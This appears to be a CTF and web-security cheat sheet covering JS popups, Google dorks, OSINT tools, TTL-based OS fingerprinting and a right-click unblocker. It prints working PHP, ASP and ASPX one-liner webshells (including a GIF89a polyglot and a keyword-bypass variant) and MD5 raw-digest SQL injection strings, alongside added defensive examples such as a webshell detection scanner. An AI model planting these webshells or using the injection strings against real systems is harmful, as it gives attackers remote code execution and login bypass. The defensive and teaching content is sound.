JavaScript:

Three kinds of JS pop-up prompt boxes:

alert("flag");	// pops up an alert box with a single button
confirm("flag"); // shows a dialog with "OK" and "Cancel" buttons; a conditional on the result can follow
prompt("flag"); // shows a dialog in which text can be entered
fillText('flag',x,y); // draws text at the given position (canvas 2D context method, not a pop-up)

Generally, if the front-end program is JS, try these first to find the flag. If you find it but cannot read it, or it is buried in a big pile of code, try copying it into the console and running it.

JS front-end filtering

You can disable JS in the browser to remove front-end filtering. Moreover, if authorization is done only in front-end JS, you can access anything at will (horizontal/vertical privilege escalation).

Kali commands: find subdomains and IP addresses

DNS update record resolution

Modify the TTL value used when pinging

netsh interface ipv4 set global defaultcurhoplimit=64

# Google hack

  • inurl:pdf 计算机 site:baidu.com    PDF files within the given site that contain the string "计算机"

  • filetype:xls "username | password"    xls files that contain "username" or "password"

  • site:mit.edu filetype:pdf net security    PDF files related to "network security" within the given site

CDN

When active scanning cannot be used, https://ping.chinaz.com can show Baidu's CDN nodes in different regions.

Information-gathering software, open-source intelligence (OSINT) collection and forensics

  • Maltego
  • sn0int
  • ZoomEye

vim

vim says the file is read-only and will not save? Leave insert mode, type :w !sudo tee % to save, then :q! to exit.

openssl

openssl passwd -1

One-liner webshells (一句话木马)

// PHP one-liner
<?php @eval($_POST['2333']); ?>

// JS-tag one-liner (GIF89a header so the file passes as an image)
GIF89a
<script language="php">eval($_POST["2333"]);</script>

// Short tags
<?=eval($_POST['a']);?>
<?=phpinfo();?>

// PHP keyword bypass: "assert" is assembled at runtime with str_replace
GIF89a
<?php
$a = str_replace("b", "", "absbsbebrbt");
$a($_POST['x']);
?>

// ASP one-liner
<%eval request("cmd")%>

// ASPX one-liner
<%@ Page Language="Jscript"%>
<%eval(Request.Item["cmd"],"unsafe");%>
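Seen from the defender's side, the one-liners above share a few textual tells: eval applied to request data, a request value called as a function, a keyword assembled with str_replace, and an image magic header immediately followed by server-side code. The scanner below is an added example, not part of these notes; its rules and sample files are constructed for illustration, and a real scanner would need far more signatures.

```python
import re

# Constructed detection rules derived from the one-liners listed above.
# Each rule is (name, compiled regex). They illustrate where detection bites; they are not a real ruleset.
RULES = [
    ("eval on request data",
     re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I)),
    ("request data called as a function",          # $a($_POST['x']) after keyword assembly
     re.compile(r"\$\w+\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[")),
    ("keyword assembled with str_replace",         # weak on its own; strong with the rule above
     re.compile(r"str_replace\s*\(\s*['\"][^'\"]*['\"]\s*,\s*['\"]{2}\s*,", re.I)),
    ("script tag declaring language=php",
     re.compile(r"<script[^>]*\blanguage\s*=\s*['\"]php['\"]", re.I)),
    ("asp eval of request()",
     re.compile(r"<%\s*eval\s+request\s*\(", re.I)),
    ("aspx eval with unsafe flag",
     re.compile(r"\beval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*['\"]unsafe['\"]", re.I)),
    ("image magic header followed by server-side code",   # GIF89a polyglot upload trick
     re.compile(r"\AGIF89a.{0,16}?<(?:\?|%|script)", re.I | re.S)),
]


def scan(content: str) -> list[str]:
    """Return the names of every rule that matches the given file content."""
    return [name for name, rx in RULES if rx.search(content)]


def is_suspicious(content: str) -> bool:
    return bool(scan(content))


# Constructed samples: the shells above as they would sit in uploaded files,
# plus a benign PHP page that also reads $_POST and must not be flagged.
SAMPLES = {
    "php_eval.php": "<?php @eval($_POST['2333']); ?>",
    "polyglot.gif": "GIF89a\n<script language=\"php\">eval($_POST[\"2333\"]);</script>",
    "short_tag.php": "<?=eval($_POST['a']);?>",
    "assembled.php": "GIF89a\n<?php\n$a = str_replace(\"b\", \"\", \"absbsbebrbt\");\n$a($_POST['x']);\n?>",
    "shell.asp": "<%eval request(\"cmd\")%>",
    "shell.aspx": "<%@ Page Language=\"Jscript\"%>\n<%eval(Request.Item[\"cmd\"],\"unsafe\");%>",
    "contact.php": "<?php echo htmlspecialchars($_POST['name'] ?? ''); ?>",
}

if __name__ == "__main__":
    for fname, body in SAMPLES.items():
        print(f"{fname:15} {scan(body) or 'clean'}")
```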

md5:

Strings whose hash turns into SQL injection (when the raw digest is concatenated into a query):

ffifdyop
129581926211651571912466741651878684928
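Why the two strings above work, as an added example that is not part of these notes: PHP's md5($p, true) returns the 16 raw digest bytes, and the digest of ffifdyop begins with the bytes 'or'. The Python below reproduces the raw digest, checks for that fragment, and shows the concatenated query next to a hardened form; the query shape and table name are assumptions.

```python
import hashlib


def raw_md5(s: str) -> bytes:
    """Same bytes as PHP md5($s, true): the 16 raw digest bytes, not the hex string."""
    return hashlib.md5(s.encode()).digest()


def injects_when_concatenated(s: str) -> bool:
    """True if splicing the raw digest into ... password='<digest>' closes the quote
    and appends an OR, i.e. the digest contains the bytes 'or' (hex 27 6f 72 27)."""
    return b"'or'" in raw_md5(s).lower()


def build_unsafe_query(username: str, password: str) -> str:
    """The vulnerable pattern: raw digest concatenated straight into the SQL text.
    For ffifdyop the clause becomes password=''or'6...' which MySQL evaluates as
    '' OR 6, i.e. true for every row."""
    digest = raw_md5(password).decode("latin-1")
    return f"SELECT * FROM users WHERE username='{username}' AND password='{digest}'"


def build_safe_query(username: str, password: str) -> tuple[str, tuple[str, str]]:
    """Hardened form: a hex digest (only [0-9a-f], so no quote can ever appear)
    passed as a bound parameter instead of concatenated. Unsalted MD5 remains an
    unsuitable password hash; a slow salted algorithm belongs in real systems."""
    return ("SELECT * FROM users WHERE username=? AND password=?",
            (username, hashlib.md5(password.encode()).hexdigest()))


if __name__ == "__main__":
    for magic in ("ffifdyop", "129581926211651571912466741651878684928"):
        print(magic, raw_md5(magic).hex(), injects_when_concatenated(magic))
    print(build_unsafe_query("admin", "ffifdyop"))
```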

Collisions:

I still recommend generating them directly with the fastcoll tool.


Identifying the OS type from the TTL

OS type          TTL value returned by ping
Windows 2000     128
Linux            64
Windows NT       107
Windows 9x       128 / 107
Solaris          252
IRIX             240
AIX              247
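A small classifier for the table above, as an added example that is not part of these notes: a reply TTL is attributed to the nearest standard initial value (64, 128, 255) and the difference gives a hop estimate, which is why the table lists 107, 252, 240 and 247 rather than round numbers. The 255 class and the OS labels are this example's own constructed mapping, and the ping output is constructed; remember from the netsh command above that the initial TTL is administrator-controlled, so this is a hint, not proof.

```python
import re

# Standard initial TTLs with a constructed OS label for each class.
# Values in the table such as 107 or 252 are what arrives after some hops.
OS_BY_INITIAL_TTL = {
    64: "linux",
    128: "windows",
    255: "solaris/irix (unix starting at 255)",
}


def classify_ttl(observed: int) -> tuple[int, int, str]:
    """Return (initial_ttl, estimated_hops, os_guess) for a TTL seen in a ping reply."""
    if not 1 <= observed <= 255:
        raise ValueError(f"TTL out of range: {observed}")
    for initial, os_name in sorted(OS_BY_INITIAL_TTL.items()):
        if observed <= initial:
            return initial, initial - observed, os_name
    raise AssertionError("unreachable: 255 covers every valid TTL")


# Matches both the Linux form "ttl=54" and the Windows form "TTL=118".
PING_TTL = re.compile(r"\bttl=(\d+)", re.I)


def ttl_from_ping_line(line: str):
    """Extract the TTL from one ping reply line, or None for lines without one."""
    m = PING_TTL.search(line)
    return int(m.group(1)) if m else None


def fingerprint_ping_output(text: str) -> list[tuple[int, int, str]]:
    """Classify every reply line in a block of ping output."""
    results = []
    for line in text.splitlines():
        ttl = ttl_from_ping_line(line)
        if ttl is not None:
            results.append(classify_ttl(ttl))
    return results


# Constructed sample output: one Linux-style reply, one Windows-style reply, one timeout.
SAMPLE = """\
64 bytes from 10.0.0.5: icmp_seq=1 ttl=54 time=1.23 ms
Reply from 10.0.0.9: bytes=32 time=1ms TTL=118
Request timed out.
"""

if __name__ == "__main__":
    for initial, hops, guess in fingerprint_ping_output(SAMPLE):
        print(f"initial={initial} hops={hops} guess={guess}")
```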

OWASP

Open Web Application Security Project

In a sense it also provides attack ideas for penetration testing.

Removing a page's right-click block


(function() {
  var doc = document,
      bd = doc.body;
  // Clear every handler the page may have installed to block selection, copy,
  // paste, keyboard shortcuts, the context menu, dragging and mouse movement.
  bd.onselectstart = bd.oncopy = bd.onpaste = bd.onkeydown = bd.oncontextmenu = bd.onmousemove = bd.ondragstart = doc.onselectstart = doc.oncopy = doc.onpaste = doc.onkeydown = doc.oncontextmenu = null;
  // Replace the document-level handlers with ones that allow the default action.
  doc.onselectstart = doc.oncontextmenu = doc.onmousedown = doc.onkeydown = function() {
    return true;
  };
  // wrappedJSObject is the unwrapped page object under Firefox/Greasemonkey; fall back to the plain document.
  with (doc.wrappedJSObject || doc) {
    onmouseup = null;
    onmousedown = null;
    oncontextmenu = null;
  }
  // Do the same for every element on the page.
  var allElements = doc.getElementsByTagName('*');
  for (var i = allElements.length; i > 0;) {
    var elmOne = allElements[--i];
    with (elmOne.wrappedJSObject || elmOne) {
      onmouseup = null;
      onmousedown = null;
    }
  }
  alert('已解除复制与右键限制');
  // Re-enable text selection. setProperty is required to set the !important
  // priority; assigning the string 'auto!important' to a style property is silently ignored.
  bd.style.setProperty('-webkit-user-select', 'auto', 'important');
  bd.style.setProperty('-moz-user-select', 'auto', 'important');
})();

System program formats

Linux executables are ELF files; Windows executables are EXE files.

sha1

Collision
